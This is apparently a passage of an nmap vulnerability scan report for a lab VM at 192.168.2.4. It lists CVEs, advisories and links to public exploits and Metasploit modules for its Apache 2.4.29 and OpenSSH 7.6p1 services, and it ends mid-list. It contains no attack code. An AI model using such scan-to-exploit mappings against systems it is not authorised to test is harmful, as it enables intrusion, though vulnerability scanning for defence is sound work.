- http://www.openvas.org: [855524] Solaris Update for Apache 2 120544-14 [855077] Solaris Update for Apache 2 120543-14 [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [72626] Debian Security Advisory DSA 2579-1 (apache2) [71551] Gentoo Security Advisory GLSA 201206-25 (apache) [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat) [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security) [71256] Debian Security Advisory DSA 2452-1 (apache2) [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid) [70724] Debian Security Advisory DSA 2405-1 (apache2) [70235] Debian Security Advisory DSA 2298-2 (apache2) [70233] Debian Security Advisory DSA 2298-1 (apache2) [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external) [69338] Debian Security Advisory DSA 2202-1 (apache2) [65131] SLES9: Security update for Apache 2 oes/CORE [64426] Gentoo Security Advisory GLSA 200907-04 (apache) [61381] Gentoo Security Advisory GLSA 200807-06 (apache) [60582] Gentoo Security Advisory GLSA 200803-19 (apache) [58745] Gentoo Security Advisory GLSA 200711-06 (apache) [57851] Gentoo Security Advisory GLSA 200608-01 (apache) [56246] Gentoo Security Advisory GLSA 200602-03 (Apache) [55392] Gentoo Security Advisory GLSA 200509-12 (Apache) [55129] Gentoo Security Advisory GLSA 200508-15 (apache) [54739] Gentoo Security Advisory GLSA 200411-18 (apache) [54724] Gentoo Security Advisory GLSA 200411-03 (apache) [54712] Gentoo Security Advisory GLSA 200410-21 (apache) [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache) [54677] Gentoo Security Advisory GLSA 200409-21 (apache) [54610] Gentoo Security Advisory GLSA 200407-03 (Apache) [54601] Gentoo Security Advisory GLSA 200406-16 (Apache) [54590] Gentoo Security Advisory GLSA 200406-05 (Apache) [54582] Gentoo Security Advisory GLSA 200405-22 (Apache) [54529] Gentoo Security Advisory GLSA 200403-04 (Apache) [54499] Gentoo Security Advisory GLSA 200310-04 (Apache) [54498] Gentoo Security Advisory GLSA 200310-03 (Apache) [11092] Apache 2.0.39 Win32 directory traversal [66081] SLES11: Security update for Apache 2 [66074] SLES10: Security update for Apache 2 [66070] SLES9: Security update for Apache 2 [65893] SLES10: Security update for Apache 2 [65888] SLES10: Security update for Apache 2 [65510] SLES9: Security update for Apache 2 [65249] SLES9: Security update for Apache 2 [65230] SLES9: Security update for Apache 2 [65228] SLES9: Security update for Apache 2 [65207] SLES9: Security update for Apache 2 [65136] SLES9: Security update for Apache 2 [65017] SLES9: Security update for Apache 2 SecurityTracker - https://www.securitytracker.com: [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users OSVDB - http://www.osvdb.org: [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-trane-info	Problem with XML parsing of /evox/about
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-enum	/robots.txt: Robots file /css/cake.generic.css: CakePHP application /img/cake.icon.png: CakePHP application /manual/: Potentially interesting folder
	vulners	cpe:/a:apache:http_server:2.4.29: E899CC4B-A3FD-5288-BB62-A4201F93FDCC 10.0 https://vulners.com/githubexploit/E899CC4B-A3FD-5288-BB62-A4201F93FDCC EXPLOIT CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ EXPLOIT EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB EXPLOIT EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 EXPLOIT CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/ EXPLOIT MSF:ILITIES/SUSE-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ EXPLOIT MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ EXPLOIT FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 EXPLOIT CVE-2022-22721 6.8 https://vulners.com/cve/CVE-2022-22721 CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 EXPLOIT 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 EXPLOIT 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B EXPLOIT CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ EXPLOIT CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1333/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1303/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ EXPLOIT CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 CVE-2022-30522 5.0 https://vulners.com/cve/CVE-2022-30522 CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189 CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303 CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ 4.9 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ EXPLOIT CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 MSF:ILITIES/UBUNTU-CVE-2018-1302/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1301/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ EXPLOIT CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302 CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301 CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D EXPLOIT 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 EXPLOIT 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ EXPLOIT CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 EXPLOIT
	http-dombased-xss	Couldn't find any DOM based XSS.

Misc Metrics (click to expand)

192.168.2.4(online)

Address

192.168.2.4 (ipv4)
00:0C:29:2C:79:B2 - VMware (mac)

Ports

The 997 ports scanned but not shown below are in state: filtered

987 ports replied with: no-response
10 ports replied with: host-prohibited

Port		State (toggle closed [1] \| filtered [0])	Service	Reason	Product	Version	Extra info
22	tcp	open	ssh	syn-ack	OpenSSH	7.6p1 Ubuntu 4ubuntu0.7	Ubuntu Linux; protocol 2.0
	vulscan	VulDB - https://vuldb.com: [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config privilege escalation [130370] OpenSSH 7.9 privilege escalation [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter privilege escalation [129007] OpenSSH 7.9 scp Client scp.c privilege escalation [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c Username information disclosure [123011] OpenSSH up to 7.7 auth2-gss.c information disclosure [112267] OpenSSH up to 7.3 sshd kex.c/packet.c denial of service [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open privilege escalation [94611] OpenSSH up to 7.3 Access Control privilege escalation [94610] OpenSSH up to 7.3 Shared Memory Manager memory corruption [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation [90671] OpenSSH up to 7.2 auth-passwd.c auth_password privilege escalation [90405] OpenSSH up to 7.2p2 sshd information disclosure [90404] OpenSSH up to 7.2p2 sshd information disclosure [90403] OpenSSH up to 7.2p2 sshd denial of service [89622] OpenSSH 7.2p2 Authentication Username information disclosure [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation [80656] OpenBSD OpenSSH 7.1 X11 Forwarding 7PK Security Features [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption MITRE CVE - https://cve.mitre.org: [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH 